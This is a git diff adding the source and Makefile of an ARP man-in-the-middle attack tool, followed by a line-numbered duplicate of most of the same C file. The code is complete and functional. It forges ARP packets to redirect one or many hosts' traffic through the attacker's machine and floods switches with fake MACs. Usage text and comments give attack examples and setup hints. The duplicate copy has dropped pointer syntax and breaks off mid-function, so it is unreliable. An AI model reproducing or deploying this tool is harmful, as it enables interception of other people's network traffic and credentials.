2 files changed, 597 insertions, 0 deletions
diff --git a/other/arpmitm/Makefile b/other/arpmitm/Makefile
new file mode 100644
index 0000000..603c4f2
--- /dev/null
+++ b/other/arpmitm/Makefile
@@ -0,0 +1,13 @@
+CC=gcc
+CFLAGS=-Wall -O2
+LIBS=-lm
+LIBNET_DEFS=`libnet-config --defines`
+LIBNET_LIBS=`libnet-config --libs`
+all:
+        $(CC) $(CFLAGS) $(LIBNET_DEFS) arpmitm.c -o arpmitm $(LIBS) $(LIBNET_LIBS)
+        strip arpmitm
+clean:
+        rm -vf arpmitm
diff --git a/other/arpmitm/arpmitm.c b/other/arpmitm/arpmitm.c
new file mode 100644
index 0000000..99362ab
--- /dev/null
+++ b/other/arpmitm/arpmitm.c
@@ -0,0 +1,584 @@
+/*
+ * ARP MITM attack tool. (c) xdr 2000
+ * rewritten & enhanced by skyper 2001
+ * Idea from scut's arptool - Requires Libnet 1.00.
+ *
+ * Changes:
+ *      skyper  : - rewritten
+ *                - macoff
+ *                - ip-list file input/output,
+ *                      <ip1>[:<mac1>]
+ *                      <ip2>[:<mac2>]
+ *                      ...
+ *                - asymmetric arpmim support (usefull for ssl/sshd mim)
+ *                - 1:N and n:N arpmim (experimental)
+ *                - ARP_REQUEST/REPLY (see informationals 001)
+ *                  [UPDATE: same techniq works against obsd2.8
+ *                  solaris 7+8, hpux10.20, hpux11.00, fbsd4.2, linux 2.2]
+ * 
+ * Features:
+ * - classic mim: redirect data from 1 host to 1 host via your host.
+ * - redirect data from n hosts to 1 host via your host with specific ip:mac.
+ * - redirect data from N/all hosts to 1 host via your host with just 
+ *   1 packet every 10 seconds. We use broadcast mac with unicast 
+ *   arp-information in the packet.
+ * - redirect communication from n hosts to n hosts via your host
+ *   with just n packets (and _not_ n*n as most(all?) existing arpmim tools.
+ * 
+ * Hints:
+ * - dont forgett to enable forwarding:
+ *   "echo 1 >/proc/sys/net/ipv4/ip_forward"
+ * - dont use NAT/connection tracking while hijaking.
+ * - configure your firewall (input, output, forward rules)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <unistd.h>
+#include <signal.h>
+#include <math.h>
+#include <string.h>
+#include <libnet.h>
+#define LINK_DEV        "eth0"
+#define MAXBUFSIZE      1024
+#define RECACHE_TIME    10
+#define int_ntoa(x)     inet_ntoa(*((struct in_addr *)&(x)))
+#define OPT_ASYM        0x01
+#define OPT_FILE        0x02
+#define OPT_REVASYM     0x04
+#define OPT_MACOFF      0x08
+static char rcs_id[] = "$Id: arpmitm.c,v 1.4 2001/03/29 17:13:16 skyper Exp $";
+struct arp_mitm {
+        unsigned char ether_src[6];
+        unsigned char ether_dst[6];
+        unsigned long s_addr;
+        unsigned long d_addr;
+};
+struct _ipmac {
+        unsigned char mac[6];
+        unsigned long ip;
+};
+struct _opt {
+        unsigned long int pwait;
+        u_short arpop;
+        struct _ipmac trgt;
+        int verb;
+        unsigned char mymac[6];
+        unsigned char flags;
+        char *ldev;
+        struct libnet_link_int *link;
+        unsigned long int (*initipmac) (void *);
+        unsigned long int (*getnextipmac) (void *);
+        unsigned long int (*resetipmac) (void *);
+} opt;
+struct _avlopt {
+        int pos;
+        int len;
+        char **argvlist;
+} avl;
+struct _fl {
+        FILE *fd;
+} fl;
+/*
+ * spread mode ip structure. all ip infos in HBO
+ */
+struct _srdnfo {
+        unsigned long ip_offset;
+        unsigned long ip_blklen;
+        unsigned long ip_pos;
+        unsigned long start_ip;
+        unsigned long end_ip;
+};
+void parse_mac(char *, unsigned char *);
+u_long gennext_spreadip(struct _srdnfo *);
+int init_spreadset(struct _srdnfo *, u_long, u_long);
+int str2ipmac(char *, struct _ipmac *);
+void die(int, char *, ...);
+static unsigned char *pkt;
+int
+dummy()
+{
+        return (0);
+}
+unsigned long int
+init_argvlist(char *argv[])
+{
+        avl.argvlist = argv;
+        avl.len = 0;
+        avl.pos = 0;
+        if (avl.argvlist == NULL)
+                return (-1);
+        while (avl.argvlist[avl.len] != NULL)
+                avl.len++;
+        return (0);
+}
+unsigned long int
+getnext_argvlist(struct _ipmac *ipmac)
+{
+        if (avl.pos >= avl.len)
+                return(-1);
+        str2ipmac(avl.argvlist[avl.pos++], ipmac);
+        return (0);
+}
+unsigned long int
+reset_argvlist()
+{
+        if (opt.verb > 1)
+                printf("restarting from the beginning.\n");
+        avl.pos = 0;
+        return (0);
+}
+unsigned long int
+getnext_filelist(struct _ipmac *ipmac)
+{
+        char buf[128];
+        if (fgets(buf, sizeof(buf)-1, fl.fd) == NULL)
+                return (-1);
+        str2ipmac(buf, ipmac);
+        return (0);
+}
+unsigned long int
+reset_filelist()
+{
+        if (opt.verb > 1)
+                printf("reached eof. restarting filelist\n");
+        return (fseek(fl.fd, 0L, SEEK_SET));
+}
+unsigned long int
+getnext_random(struct _ipmac *ipmac)
+{
+        static char i = 0;
+        if (i == 0)
+        {
+                srand((int)time(NULL));
+                i = 1;
+        }
+        opt.trgt.ip = rand();
+        ipmac->ip = rand();     /* we honestly dont care about the      */
+                                /* first 2 bytes of the mac....         */
+        memcpy(ipmac->mac+2, (char *)&(ipmac->ip), 4);
+        memcpy(opt.trgt.mac+2, (char *)&(opt.trgt.ip), 4);
+        memcpy(opt.mymac, ipmac->mac, 6);
+        return (0);
+}
+void
+init_vars()
+{
+        opt.pwait = 4000;
+        opt.arpop = ARPOP_REPLY;
+        opt.flags = 0;
+        opt.verb = 0;
+        opt.ldev = LINK_DEV;
+        opt.initipmac = (void *) init_argvlist;
+        opt.getnextipmac = (void *) getnext_argvlist;
+        opt.resetipmac = (void *) reset_argvlist;
+}
+/*
+ * this is for sure not reentrant.
+ * returns mac-string from mac
+ * NULL on error
+ */
+static char *
+mac2str(unsigned char m[6])
+{
+        static char buf[32];
+        sprintf(buf, "%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x", m[0], m[1], m[2],
+                                                        m[3], m[4], m[5]);
+        return (buf);
+}
+/*
+ * convert "<ip>:<mac> touple to ipmac struct
+ * Set "ff:ff:ff:ff:ff:ff" if no mac is given.
+ * return -1 on failure, 0 on success
+ */
+int
+str2ipmac(char *str, struct _ipmac *ipmac)
+{
+        char *ptr;
+        char str2[128];
+        if (ipmac == NULL)
+                return (-1);
+        if (str == NULL)
+                return (-1);
+        strncpy(str2, str, sizeof(str2)-1);
+        str2[sizeof(str2)-1] = '\0';
+        if ((ptr = strchr(str2, ':')) != NULL)
+        {
+                *ptr++ = '\0';
+                parse_mac(ptr, ipmac->mac);
+        } else {
+                memcpy(ipmac->mac, "\xff\xff\xff\xff\xff\xff", 6);
+        }
+        ipmac->ip = inet_addr(str2);
+        
+        return (0);
+}
+void 
+usage(int code, char *string)
+{
+        fprintf(stderr, "ERROR: %s\n", string);
+        fprintf(stderr,
+"\n"
+"Usage:\n"
+"arpmim [OPTION] <your mac> <targetip[:targetmac] <ip1[:mac1]> ...\n"
+"[Tell ip1, ip2, ... ipN that targetip has <your mac> and\n"
+" tell targetip that ip1, ip2, ... ipN has <your mac>]\n\n"
+"Options:\n"
+" -i <device>   : ethernet device [default=eth0]\n"
+" -l <iprange>  : generate ip-list [73.50.0.0-73.50.31.255]\n"
+" -f <file>     : read ip's[/:mac's] from file\n"
+" -w <n ms>     : wait n ms between each packet [default=4sec]\n"
+" -m            : macoff (macflood, elite switch -> lame hub)\n"
+" -r            : use ARPOP_REQUEST [default=ARPOP_REPLY]\n"
+" -a            : asymmetric\n"
+" -A            : reverse asymmetric\n"
+" -v            : verbose output [-vv..vv for more]\n"
+"\nExamples:\n"
+"Classic (1:1, gate=10.0.255.254, luser=10.0.119.119):\n"
+"arpmim -v 00:02:13:37:73:50 10.0.255.254:11:11:22:22:33:33 \\\n"
+"                            10.0.119.119:44:44:55:55:66:66\n"
+"\n"
+"Advanced (1:N, gate=10.0.255.254, asymmetric _only_):\n"
+"arpmim -A -v 00:02:13:37:73:50 255.255.255.255 10.0.255.254\n"
+"[tell everyone that 10.0.255.254 has 00:02:13:37:73:50]\n"
+"\n"
+"Elite (n:N):\n"
+"arpmim -A -v 00:02:13:37:73:50 255.255.255.255 10.0.0.1 10.0.0.2 10.0.0.3 \\\n"
+"                                               10.0.0.4 10.0.0.5 10.0.0.6\n"
+"[tell 10.0.0.1,..10.0.0.6 that 10.0.0.1,..10.0.0.6 has 00:02:13:37:73:50]\n");
+        exit(code);
+}
+/*
+ * write ip's to fd, one per line.
+ * return 0 on success, -1 on error
+ */
+int
+write_iprange(FILE *fd, char *str)
+{
+        u_long ip;
+        char *ptr;
+        struct _srdnfo srdnfo;
+        char str2[128];
+        strncpy(str2, str, sizeof(str2)-1);
+        str2[sizeof(str2)-1] = '\0';
+        if ((ptr = strchr(str2, '-')) == NULL)
+                return (-1);
+        *ptr++ = '\0';
+        srdnfo.start_ip = ntohl(inet_addr(str2));
+        srdnfo.end_ip = ntohl(inet_addr(ptr));
+        if (init_spreadset(&srdnfo, srdnfo.start_ip, srdnfo.end_ip) != 0)
+                return (-1);
+        while ((ip = gennext_spreadip(&srdnfo)) != -1)
+                printf("%s\n", int_ntoa(ip));
+        return (0);
+}
+void
+do_opt(int argc, char *argv[])
+{
+        extern char *optarg;
+        extern int optind;
+        int c;
+        while ((c = getopt (argc, argv, "w:i:l:f:mrAav")) != -1)
+        {
+                switch (c)
+                {
+                case 'r':
+                        opt.arpop = ARPOP_REQUEST;
+                        break;
+                case 'w':
+                        opt.pwait = strtoul (optarg, NULL, 10);
+                        break;
+                case 'i':
+                        opt.ldev = optarg;
+                        break;
+                case 'l':
+                        if (write_iprange(stdout, optarg) != 0)
+                                die (EXIT_FAILURE, "iprage? %s", optarg);
+                        break;
+                case 'A':
+                        opt.flags |= OPT_REVASYM;
+                        break;
+                case 'a':
+                        opt.flags |= OPT_ASYM;
+                        break;
+                case 'v':
+                        opt.verb++;
+                        break;
+                case 'f':
+                        if ((fl.fd = fopen(optarg, "r")) == NULL)
+                                die (EXIT_FAILURE, "fopen %s", optarg);
+                        opt.initipmac = (void *) dummy;
+                        opt.getnextipmac = (void *) getnext_filelist;
+                        opt.resetipmac = (void *) reset_filelist;
+                        break;
+                case 'm':
+                        opt.flags |= OPT_MACOFF;
+                        opt.initipmac = (void *) dummy;
+                        opt.getnextipmac = (void *) getnext_random;
+                        opt.resetipmac = (void *) dummy;
+                        break;
+                case ':':
+                        usage(EXIT_FAILURE, "parameter missing");
+                        break;  /* this should never happen */
+                default:
+                        usage(EXIT_FAILURE, "unknown option");
+                        break;
+                }
+        }
+        if (opt.flags & OPT_MACOFF)
+                return;
+        if (argv[optind] != NULL)
+                parse_mac(argv[optind++], opt.mymac);
+        else
+                die (EXIT_FAILURE, "you must specifiy your own mac.");
+        if (argv[optind] != NULL)
+                str2ipmac(argv[optind++], &opt.trgt);
+        else
+                die (EXIT_FAILURE, "no target given.");
+        opt.initipmac(&argv[optind]);
+}
+void cleanup(int ret)
+{
+        fprintf(stderr, "exiting...\n");
+        libnet_destroy_packet(&pkt);
+        exit(ret);
+}
+void
+die(int code, char *fmt, ...)
+{
+        va_list ap;
+        char buf[512];
+        
+        va_start (ap, fmt);
+        vsnprintf (buf, sizeof (buf) -1, fmt, ap);
+        va_end (ap);
+        fprintf(stderr, "ERROR: %s\n", buf);
+        cleanup(code);
+}
+        
+void banner( void )
+{
+        printf("\n/*\n"
+               " * ARP MITM attack tool. (c) xdr 2000\n"
+               " * rewritten & enhanced by skyper 2001\n"
+               " * %s\n"
+               " */\n", rcs_id);
+        if (opt.verb > 5)
+                printf("harharhar. PRETTY VERBOSE now you evil hacker!\n");
+}
+/*
+ * get next ip in spread-mode
+ * return NBO ip or -1 on error or when done
+ */
+u_long
+gennext_spreadip(struct _srdnfo *srdnfo)
+{
+        u_long pos = srdnfo->ip_pos;
+        if ((srdnfo->ip_offset + 1 >= srdnfo->ip_blklen)
+                && (srdnfo->ip_pos > srdnfo->end_ip))
+                return (-1);
+        if ((srdnfo->ip_pos + srdnfo->ip_blklen > srdnfo->end_ip)
+                && (srdnfo->ip_offset + 1 < srdnfo->ip_blklen))
+                srdnfo->ip_pos = srdnfo->start_ip + (++srdnfo->ip_offset);
+        else
+                srdnfo->ip_pos += srdnfo->ip_blklen;
+        return (htonl (pos));
+}
+/*
+ * init spreadset, ip's in HBO
+ * return 0 on success, -1 on error
+ */
+int
+init_spreadset(struct _srdnfo *srdnfo, u_long start_ip, u_long end_ip)
+{
+        if (srdnfo == NULL)
+                return (-1);
+        if (start_ip >= end_ip)
+                return (-1);
+        srdnfo->start_ip = start_ip;
+        srdnfo->ip_pos = srdnfo->start_ip;
+        srdnfo->end_ip = end_ip;
+        srdnfo->ip_blklen = (u_long) sqrt ((double)(end_ip - start_ip));
+        if (srdnfo->ip_blklen > 100)    /* range is 100^2 in size */
+                srdnfo->ip_blklen = 257 + srdnfo->ip_blklen * 0.2;
+        srdnfo->ip_offset = 0;
+        return (0);
+}
+void parse_mac(char *mac_string, unsigned char *mac)
+{
+  unsigned int tmp[6];
+  int i;
+        sscanf(mac_string, "%2x:%2x:%2x:%2x:%2x:%2x",
+               &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5]);
+        for(i = 0;i < 6;i++) mac[i] = tmp[i];
+}
+/*
+ * tell 'dst' that I'M src
+ * return 0 on success
+ */
+int
+do_arpmim(char *mymac, struct _ipmac *src, struct _ipmac *dst)
+{
+        libnet_build_ethernet(dst->mac,
+                              mymac,
+                              ETHERTYPE_ARP, NULL, 0, pkt);
+        libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP,
+                         6, 4, opt.arpop,
+                         mymac,
+                         (unsigned char *)&src->ip,
+                         dst->mac,
+                         (unsigned char *)&dst->ip, 
+                         NULL, 0, pkt + LIBNET_ETH_H);
+        libnet_write_link_layer(opt.link, opt.ldev, pkt,
+                                LIBNET_ETH_H + LIBNET_ARP_H);
+        return (0);
+}
+void
+print_amitm(struct _ipmac *ipmac0, struct _ipmac *ipmac)
+{
+        if (opt.verb)
+        {
+                printf("Hi %s:%s, ", int_ntoa(ipmac->ip),
+                                        mac2str(ipmac->mac));
+                printf("%s is at %s\n", int_ntoa(ipmac0->ip),
+                                         mac2str(opt.mymac));
+        }
+}
+int 
+main(int argc, char *argv[])
+{
+  char error_buf[MAXBUFSIZE + 1];
+  int i;
+  unsigned short c = 0;
+  struct _ipmac ipmac;
+        init_vars();
+        do_opt(argc, argv);
+        if (opt.initipmac == NULL)
+                usage(0, "not enough parameters");
+        banner(); 
+        if(libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &pkt) == -1)
+                die(EXIT_FAILURE, "libnet_init_packet failed.");
+        if((opt.link = libnet_open_link_interface(opt.ldev, error_buf)) == NULL)
+                die(EXIT_FAILURE, "libnet_open_link_interface failed: %s.",
+                        error_buf);
+        signal(SIGINT, cleanup);
+        signal(SIGKILL, cleanup);
+        c = 0;
+        i = 0;
+        while (1)
+        {
+                if (opt.getnextipmac(&ipmac) == -1)
+                {
+                        if (opt.resetipmac(NULL) != 0)
+                                die(EXIT_FAILURE, "unable to reset ipmac list");
+                        opt.getnextipmac(&ipmac);
+                }
+                if (!(opt.flags & OPT_REVASYM))
+                {
+                        if (opt.verb)
+                                print_amitm(&opt.trgt, &ipmac);
+                        do_arpmim(opt.mymac, &opt.trgt, &ipmac);
+                }
+                if (!(opt.flags & OPT_ASYM))
+                {
+                        usleep(3000); /* 0.03 seconds */
+                        if (opt.verb)
+                                print_amitm(&ipmac, &opt.trgt);
+                        do_arpmim(opt.mymac, &ipmac, &opt.trgt);
+                }
+                usleep(opt.pwait * 1000);
+        }
+        exit (EXIT_SUCCESS);
+        return (EXIT_SUCCESS);
+}

diff --git a/other/arpmitm/Makefile b/other/arpmitm/Makefile new file mode 100644 index 0000000..603c4f2 --- /dev/null +++ b/other/arpmitm/Makefile
@@ -0,0 +1,13 @@
	1	CC=gcc
	2	CFLAGS=-Wall -O2
	3	LIBS=-lm
	4	LIBNET_DEFS=`libnet-config --defines`
	5	LIBNET_LIBS=`libnet-config --libs`
	6
	7	all:
	8
	9	$(CC) $(CFLAGS) $(LIBNET_DEFS) arpmitm.c -o arpmitm $(LIBS) $(LIBNET_LIBS)
	10	strip arpmitm
	11
	12	clean:
	13	rm -vf arpmitm


diff --git a/other/arpmitm/arpmitm.c b/other/arpmitm/arpmitm.c new file mode 100644 index 0000000..99362ab --- /dev/null +++ b/other/arpmitm/arpmitm.c
@@ -0,0 +1,584 @@
	1	/*
	2	* ARP MITM attack tool. (c) xdr 2000
	3	* rewritten & enhanced by skyper 2001
	4	* Idea from scut's arptool - Requires Libnet 1.00.
	5	*
	6	* Changes:
	7	* skyper : - rewritten
	8	* - macoff
	9	* - ip-list file input/output,
	10	* <ip1>[:<mac1>]
	11	* <ip2>[:<mac2>]
	12	* ...
	13	* - asymmetric arpmim support (usefull for ssl/sshd mim)
	14	* - 1:N and n:N arpmim (experimental)
	15	* - ARP_REQUEST/REPLY (see informationals 001)
	16	* [UPDATE: same techniq works against obsd2.8
	17	* solaris 7+8, hpux10.20, hpux11.00, fbsd4.2, linux 2.2]
	18	*
	19	* Features:
	20	* - classic mim: redirect data from 1 host to 1 host via your host.
	21	* - redirect data from n hosts to 1 host via your host with specific ip:mac.
	22	* - redirect data from N/all hosts to 1 host via your host with just
	23	* 1 packet every 10 seconds. We use broadcast mac with unicast
	24	* arp-information in the packet.
	25	* - redirect communication from n hosts to n hosts via your host
	26	* with just n packets (and _not_ n*n as most(all?) existing arpmim tools.
	27	*
	28	* Hints:
	29	* - dont forgett to enable forwarding:
	30	* "echo 1 >/proc/sys/net/ipv4/ip_forward"
	31	* - dont use NAT/connection tracking while hijaking.
	32	* - configure your firewall (input, output, forward rules)
	33	*/
	34
	35	#include <stdio.h>
	36	#include <stdlib.h>
	37	#include <stdarg.h>
	38	#include <unistd.h>
	39	#include <signal.h>
	40	#include <math.h>
	41	#include <string.h>
	42	#include <libnet.h>
	43
	44	#define LINK_DEV "eth0"
	45	#define MAXBUFSIZE 1024
	46	#define RECACHE_TIME 10
	47	#define int_ntoa(x) inet_ntoa(((struct in_addr )&(x)))
	48	#define OPT_ASYM 0x01
	49	#define OPT_FILE 0x02
	50	#define OPT_REVASYM 0x04
	51	#define OPT_MACOFF 0x08
	52
	53	static char rcs_id[] = "$Id: arpmitm.c,v 1.4 2001/03/29 17:13:16 skyper Exp $";
	54
	55	struct arp_mitm {
	56	unsigned char ether_src[6];
	57	unsigned char ether_dst[6];
	58	unsigned long s_addr;
	59	unsigned long d_addr;
	60	};
	61
	62	struct _ipmac {
	63	unsigned char mac[6];
	64	unsigned long ip;
	65	};
	66
	67	struct _opt {
	68	unsigned long int pwait;
	69	u_short arpop;
	70	struct _ipmac trgt;
	71	int verb;
	72	unsigned char mymac[6];
	73	unsigned char flags;
	74	char *ldev;
	75	struct libnet_link_int *link;
	76	unsigned long int (initipmac) (void );
	77	unsigned long int (getnextipmac) (void );
	78	unsigned long int (resetipmac) (void );
	79	} opt;
	80
	81	struct _avlopt {
	82	int pos;
	83	int len;
	84	char **argvlist;
	85	} avl;
	86
	87	struct _fl {
	88	FILE *fd;
	89	} fl;
	90
	91	/*
	92	* spread mode ip structure. all ip infos in HBO
	93	*/
	94	struct _srdnfo {
	95	unsigned long ip_offset;
	96	unsigned long ip_blklen;
	97	unsigned long ip_pos;
	98	unsigned long start_ip;
	99	unsigned long end_ip;
	100	};
	101
	102	void parse_mac(char , unsigned char );
	103	u_long gennext_spreadip(struct _srdnfo *);
	104	int init_spreadset(struct _srdnfo *, u_long, u_long);
	105	int str2ipmac(char , struct _ipmac );
	106	void die(int, char *, ...);
	107
	108
	109
	110	static unsigned char *pkt;
	111
	112	int
	113	dummy()
	114	{
	115	return (0);
	116	}
	117
	118	unsigned long int
	119	init_argvlist(char *argv[])
	120	{
	121	avl.argvlist = argv;
	122	avl.len = 0;
	123	avl.pos = 0;
	124
	125	if (avl.argvlist == NULL)
	126	return (-1);
	127
	128	while (avl.argvlist[avl.len] != NULL)
	129	avl.len++;
	130
	131	return (0);
	132	}
	133
	134	unsigned long int
	135	getnext_argvlist(struct _ipmac *ipmac)
	136	{
	137	if (avl.pos >= avl.len)
	138	return(-1);
	139
	140	str2ipmac(avl.argvlist[avl.pos++], ipmac);
	141	return (0);
	142	}
	143
	144	unsigned long int
	145	reset_argvlist()
	146	{
	147	if (opt.verb > 1)
	148	printf("restarting from the beginning.\n");
	149
	150	avl.pos = 0;
	151	return (0);
	152	}
	153
	154	unsigned long int
	155	getnext_filelist(struct _ipmac *ipmac)
	156	{
	157	char buf[128];
	158
	159	if (fgets(buf, sizeof(buf)-1, fl.fd) == NULL)
	160	return (-1);
	161
	162	str2ipmac(buf, ipmac);
	163	return (0);
	164	}
	165
	166	unsigned long int
	167	reset_filelist()
	168	{
	169	if (opt.verb > 1)
	170	printf("reached eof. restarting filelist\n");
	171
	172	return (fseek(fl.fd, 0L, SEEK_SET));
	173	}
	174
	175	unsigned long int
	176	getnext_random(struct _ipmac *ipmac)
	177	{
	178	static char i = 0;
	179
	180	if (i == 0)
	181	{
	182	srand((int)time(NULL));
	183	i = 1;
	184	}
	185
	186	opt.trgt.ip = rand();
	187	ipmac->ip = rand(); /* we honestly dont care about the */
	188	/* first 2 bytes of the mac.... */
	189	memcpy(ipmac->mac+2, (char *)&(ipmac->ip), 4);
	190	memcpy(opt.trgt.mac+2, (char *)&(opt.trgt.ip), 4);
	191	memcpy(opt.mymac, ipmac->mac, 6);
	192
	193	return (0);
	194	}
	195
	196	void
	197	init_vars()
	198	{
	199	opt.pwait = 4000;
	200	opt.arpop = ARPOP_REPLY;
	201	opt.flags = 0;
	202	opt.verb = 0;
	203	opt.ldev = LINK_DEV;
	204	opt.initipmac = (void *) init_argvlist;
	205	opt.getnextipmac = (void *) getnext_argvlist;
	206	opt.resetipmac = (void *) reset_argvlist;
	207	}
	208
	209
	210	/*
	211	* this is for sure not reentrant.
	212	* returns mac-string from mac
	213	* NULL on error
	214	*/
	215	static char *
	216	mac2str(unsigned char m[6])
	217	{
	218	static char buf[32];
	219
	220	sprintf(buf, "%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x", m[0], m[1], m[2],
	221	m[3], m[4], m[5]);
	222	return (buf);
	223	}
	224
	225	/*
	226	* convert "<ip>:<mac> touple to ipmac struct
	227	* Set "ff:ff:ff:ff:ff:ff" if no mac is given.
	228	* return -1 on failure, 0 on success
	229	*/
	230	int
	231	str2ipmac(char str, struct _ipmac ipmac)
	232	{
	233	char *ptr;
	234	char str2[128];
	235
	236	if (ipmac == NULL)
	237	return (-1);
	238	if (str == NULL)
	239	return (-1);
	240
	241	strncpy(str2, str, sizeof(str2)-1);
	242	str2[sizeof(str2)-1] = '\0';
	243	if ((ptr = strchr(str2, ':')) != NULL)
	244	{
	245	*ptr++ = '\0';
	246	parse_mac(ptr, ipmac->mac);
	247	} else {
	248	memcpy(ipmac->mac, "\xff\xff\xff\xff\xff\xff", 6);
	249	}
	250
	251	ipmac->ip = inet_addr(str2);
	252
	253	return (0);
	254	}
	255
	256	void
	257	usage(int code, char *string)
	258	{
	259	fprintf(stderr, "ERROR: %s\n", string);
	260	fprintf(stderr,
	261	"\n"
	262	"Usage:\n"
	263	"arpmim [OPTION] <your mac> <targetip[:targetmac] <ip1[:mac1]> ...\n"
	264	"[Tell ip1, ip2, ... ipN that targetip has <your mac> and\n"
	265	" tell targetip that ip1, ip2, ... ipN has <your mac>]\n\n"
	266	"Options:\n"
	267	" -i <device> : ethernet device [default=eth0]\n"
	268	" -l <iprange> : generate ip-list [73.50.0.0-73.50.31.255]\n"
	269	" -f <file> : read ip's[/:mac's] from file\n"
	270	" -w <n ms> : wait n ms between each packet [default=4sec]\n"
	271	" -m : macoff (macflood, elite switch -> lame hub)\n"
	272	" -r : use ARPOP_REQUEST [default=ARPOP_REPLY]\n"
	273	" -a : asymmetric\n"
	274	" -A : reverse asymmetric\n"
	275	" -v : verbose output [-vv..vv for more]\n"
	276	"\nExamples:\n"
	277	"Classic (1:1, gate=10.0.255.254, luser=10.0.119.119):\n"
	278	"arpmim -v 00:02:13:37:73:50 10.0.255.254:11:11:22:22:33:33 \\\n"
	279	" 10.0.119.119:44:44:55:55:66:66\n"
	280	"\n"
	281	"Advanced (1:N, gate=10.0.255.254, asymmetric _only_):\n"
	282	"arpmim -A -v 00:02:13:37:73:50 255.255.255.255 10.0.255.254\n"
	283	"[tell everyone that 10.0.255.254 has 00:02:13:37:73:50]\n"
	284	"\n"
	285	"Elite (n:N):\n"
	286	"arpmim -A -v 00:02:13:37:73:50 255.255.255.255 10.0.0.1 10.0.0.2 10.0.0.3 \\\n"
	287	" 10.0.0.4 10.0.0.5 10.0.0.6\n"
	288	"[tell 10.0.0.1,..10.0.0.6 that 10.0.0.1,..10.0.0.6 has 00:02:13:37:73:50]\n");
	289
	290	exit(code);
	291	}
	292
	293	/*
	294	* write ip's to fd, one per line.
	295	* return 0 on success, -1 on error
	296	*/
	297	int
	298	write_iprange(FILE fd, char str)
	299	{
	300	u_long ip;
	301	char *ptr;
	302	struct _srdnfo srdnfo;
	303	char str2[128];
	304
	305	strncpy(str2, str, sizeof(str2)-1);
	306	str2[sizeof(str2)-1] = '\0';
	307
	308	if ((ptr = strchr(str2, '-')) == NULL)
	309	return (-1);
	310
	311	*ptr++ = '\0';
	312
	313	srdnfo.start_ip = ntohl(inet_addr(str2));
	314	srdnfo.end_ip = ntohl(inet_addr(ptr));
	315	if (init_spreadset(&srdnfo, srdnfo.start_ip, srdnfo.end_ip) != 0)
	316	return (-1);
	317
	318	while ((ip = gennext_spreadip(&srdnfo)) != -1)
	319	printf("%s\n", int_ntoa(ip));
	320
	321	return (0);
	322	}
	323
	324
	325	void
	326	do_opt(int argc, char *argv[])
	327	{
	328	extern char *optarg;
	329	extern int optind;
	330	int c;
	331
	332	while ((c = getopt (argc, argv, "w:i:l:f:mrAav")) != -1)
	333	{
	334	switch (c)
	335	{
	336	case 'r':
	337	opt.arpop = ARPOP_REQUEST;
	338	break;
	339	case 'w':
	340	opt.pwait = strtoul (optarg, NULL, 10);
	341	break;
	342	case 'i':
	343	opt.ldev = optarg;
	344	break;
	345	case 'l':
	346	if (write_iprange(stdout, optarg) != 0)
	347	die (EXIT_FAILURE, "iprage? %s", optarg);
	348	break;
	349	case 'A':
	350	opt.flags \|= OPT_REVASYM;
	351	break;
	352	case 'a':
	353	opt.flags \|= OPT_ASYM;
	354	break;
	355	case 'v':
	356	opt.verb++;
	357	break;
	358	case 'f':
	359	if ((fl.fd = fopen(optarg, "r")) == NULL)
	360	die (EXIT_FAILURE, "fopen %s", optarg);
	361
	362	opt.initipmac = (void *) dummy;
	363	opt.getnextipmac = (void *) getnext_filelist;
	364	opt.resetipmac = (void *) reset_filelist;
	365	break;
	366	case 'm':
	367	opt.flags \|= OPT_MACOFF;
	368	opt.initipmac = (void *) dummy;
	369	opt.getnextipmac = (void *) getnext_random;
	370	opt.resetipmac = (void *) dummy;
	371	break;
	372	case ':':
	373	usage(EXIT_FAILURE, "parameter missing");
	374	break; /* this should never happen */
	375	default:
	376	usage(EXIT_FAILURE, "unknown option");
	377	break;
	378	}
	379	}
	380
	381	if (opt.flags & OPT_MACOFF)
	382	return;
	383
	384	if (argv[optind] != NULL)
	385	parse_mac(argv[optind++], opt.mymac);
	386	else
	387	die (EXIT_FAILURE, "you must specifiy your own mac.");
	388
	389	if (argv[optind] != NULL)
	390	str2ipmac(argv[optind++], &opt.trgt);
	391	else
	392	die (EXIT_FAILURE, "no target given.");
	393
	394	opt.initipmac(&argv[optind]);
	395
	396	}
	397
	398	void cleanup(int ret)
	399	{
	400	fprintf(stderr, "exiting...\n");
	401	libnet_destroy_packet(&pkt);
	402	exit(ret);
	403	}
	404
	405	void
	406	die(int code, char *fmt, ...)
	407	{
	408	va_list ap;
	409	char buf[512];
	410
	411	va_start (ap, fmt);
	412	vsnprintf (buf, sizeof (buf) -1, fmt, ap);
	413	va_end (ap);
	414	fprintf(stderr, "ERROR: %s\n", buf);
	415
	416	cleanup(code);
	417	}
	418
	419	void banner( void )
	420	{
	421	printf("\n/*\n"
	422	" * ARP MITM attack tool. (c) xdr 2000\n"
	423	" * rewritten & enhanced by skyper 2001\n"
	424	" * %s\n"
	425	" */\n", rcs_id);
	426	if (opt.verb > 5)
	427	printf("harharhar. PRETTY VERBOSE now you evil hacker!\n");
	428	}
	429
	430	/*
	431	* get next ip in spread-mode
	432	* return NBO ip or -1 on error or when done
	433	*/
	434	u_long
	435	gennext_spreadip(struct _srdnfo *srdnfo)
	436	{
	437	u_long pos = srdnfo->ip_pos;
	438
	439	if ((srdnfo->ip_offset + 1 >= srdnfo->ip_blklen)
	440	&& (srdnfo->ip_pos > srdnfo->end_ip))
	441	return (-1);
	442
	443	if ((srdnfo->ip_pos + srdnfo->ip_blklen > srdnfo->end_ip)
	444	&& (srdnfo->ip_offset + 1 < srdnfo->ip_blklen))
	445	srdnfo->ip_pos = srdnfo->start_ip + (++srdnfo->ip_offset);
	446	else
	447	srdnfo->ip_pos += srdnfo->ip_blklen;
	448
	449	return (htonl (pos));
	450	}
	451
	452	/*
	453	* init spreadset, ip's in HBO
	454	* return 0 on success, -1 on error
	455	*/
	456	int
	457	init_spreadset(struct _srdnfo *srdnfo, u_long start_ip, u_long end_ip)
	458	{
	459	if (srdnfo == NULL)
	460	return (-1);
	461
	462	if (start_ip >= end_ip)
	463	return (-1);
	464
	465	srdnfo->start_ip = start_ip;
	466	srdnfo->ip_pos = srdnfo->start_ip;
	467	srdnfo->end_ip = end_ip;
	468	srdnfo->ip_blklen = (u_long) sqrt ((double)(end_ip - start_ip));
